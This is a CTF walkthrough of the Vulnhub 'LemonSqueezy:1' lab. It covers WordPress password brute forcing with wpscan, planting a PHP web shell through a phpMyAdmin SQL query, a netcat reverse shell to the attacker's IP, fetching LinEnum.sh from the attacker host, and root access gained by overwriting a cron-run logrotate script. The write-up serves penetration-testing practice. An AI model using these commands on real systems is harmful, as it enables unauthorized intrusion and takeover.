Categories

Archives

CTF Challenges

LemonSqueezy:1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “LemonSqueezy:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to James Hay. Let’s start and learn how to successfully breach it.

Level: Easy to Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here

Penetration Testing Methodology

Reconnaissance

Nmap

Enumeration

  • Abusing HTTP Services
  • Web Directory Bruteforce (dirb)
  • Wpscan for Username and Password Enumeration

Exploitation

  • Logging to WordPress
  • Shell Uploading through PhpMyAdmin

Post Enumeration

  • Using LinEnum.sh
  • Creating Netcat Shell using msfvenom

 Privilege Escalation

  • Abusing cronjob for Writable Script
  • Capture the flag

Walkthrough

Reconnaissance

As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.1.105 as our host IP.

Then we used nmap for port enumeration. We found port 80 for http.

nmap -A 192.168.1.105

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 80 is open I look toward browser and explore target ip 192.168.1.105 . But it is not much of great help. Moving on.

http://192.168.1.105

Further, we use dirb for directory brute-forcing and found phpmyadmin & wordpress page with status code 200 OK on executing following command.

dirb http://192.168.1.105

When we searched the above-listed page, i.e. wordpress we found nothing useful.

http://192.168.1.105/wordpress

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

wpscan --url http://192.168.1.105/wordpress -e u

I found two user names: orange and lemon.

Now the next job is to hunt for a password for user orange for which we will use rockyou.txt. Time to fire up wpscan with our username & password list to valid user login combination.

wpscan --url http://192.168.1.105/wordpress -U orange -P /usr/share/wordlist/rockyou.txt

We have successfully found the password for orange. Let’s make good use of them.

Orange:ginger

 Now we mapped the domain name with the target machine’s IP address in the /etc/hosts file.

Further, we login to WordPress using orange credentials. It was holding another clue for us in edit post section we found a password i.e. nOt1n@wOrdl1st! .

Now our next job is to try to login phpmyadmin page with this password using user orange.

http://192.168.1.105/phpmyadmin

Exploitation

After logging in let’s explore the page further to find some juicy information.

Here we found the database named wordpress.

So, we have login into phpmyadmin, now it was time to exploit phpMyAdmin to get a reverse connection and we have already published a post on “Shell Uploading in Web Server through PhpMyAdmin”. With the help of this post, I try to exploit phpMyAdmin and follow the given steps.

Within the database of WordPress, we created a table as I have given raj and click on create.

Click on raj to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.

Now, the next part is interesting because here I am going to execute malicious code as SQL query which will create a Remote code Execution inside the webserver. In the following screenshot, you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

Now type the following URL to find whether we are successful or not in order to create RCE vulnerability.

http://192.168.1.101:81/wordpress/backdoor.php?cmd=whoami

When you execute the above URL in the browser you will get the information of victim ‘s PC.

Now it was time to get netcat reverse connection of the host machine by executing the following URL.

 http://192.168.1.105/wordpress/backdoor.php?cmd=nc  -e /bin/bash 192.168.1.112 1234

Now before executing the backdoor let’s fire up netcat listener in another terminal.

nc -lvp 1234

Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.

python -c 'import pty;pty.spawn("/bin/bash")
ls

here we found a text file name user.txt as 1st flag. Now let go for Privilege Escalation with the help of Linenum.sh which will help us in post enumeration.

cat user.txt

Post Enumeration

Next, we tried to download linenum.sh in /tmp but we were not able to do so because /tmp was not having the permission to do so. Since /var/www/html/wordpress is writable we will try to download there.

LinEnum.sh is bash script used for enumerating the Linux machine to checks which services are running on the machine, privileges access, version information, system information, user information etc.

  1. Download the script or get the location where this script is stored.
  2. Host the python server and copy the link of the LinEnum.sh file.
  3. Download the script in the remote host using “wget” command in the “/var/www/html/wordpress” directory.
  4. Change the permission of the LinEnum.sh shell script using “chmod” command.
  5. Now run the script in the remote machine.
cd /var/www/html/wordpress
wget http://192.168.1.112:8000/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh

So here got some information after running the shell script LinEnum.sh

As a result, we found that /etc/logrotate.d/logrotate is writable and also run as cronjob at every 2 minutes after.

cat /etc/crontab
cd /etc/logrotate.d
ls -la

Privilege Escalation

In order to compromise the machine and get the root access, we will use msfvenom for our further exploitation.

msfvenom -p /cmd/unix/reverse_netcat lhost=192.168.1.112 lport=4444 R

As we know logrotate is writable and run as a cronjob, therefore, I will overwrite this file with the following command.

echo "code here" > logrotate

On other hand we will fire up netcat listener in another terminal to get a reverse shell and wait for some 2 minutes as soon as the logrotate will execute as cronjob this will give us root privileges shell and finally capture the final flag.

nc -lvp 4444
id
cd /root
ls
cat root.txt

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here